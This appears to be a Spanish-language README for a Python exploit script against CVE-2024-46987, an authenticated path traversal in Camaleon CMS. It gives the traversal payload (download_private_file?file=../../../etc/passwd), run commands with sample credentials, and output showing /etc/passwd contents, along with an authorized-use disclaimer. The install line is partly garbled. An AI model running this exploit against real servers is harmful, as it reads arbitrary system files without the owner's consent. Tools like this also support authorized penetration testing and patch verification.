
Exploit creado usando Python
CVE-2024-46987 es una vulnerabilidad de path traversal autenticado (CWE-22) en Camaleon CMS (un sistema de gestión de contenidos basado en Ruby on Rails). Permite a un usuario autenticado (incluso con privilegios bajos) leer archivos arbitrarios en el servidor a través de la acción MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NUn atacante con credenciales válidas puede enviar una solicitud manipulada a: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtO
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Nota: El script asume un formulario de inicio de sesión estilo Rails (user[email], user[password], authenticity_token). Ajuste los campos del payload si su objetivo utiliza nombres personalizados.
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas (por ejemplo, programas de bug bounty, pentests internos, laboratorios como HTB). El uso no autorizado puede violar leyes. El autor no se hace responsable del mal uso.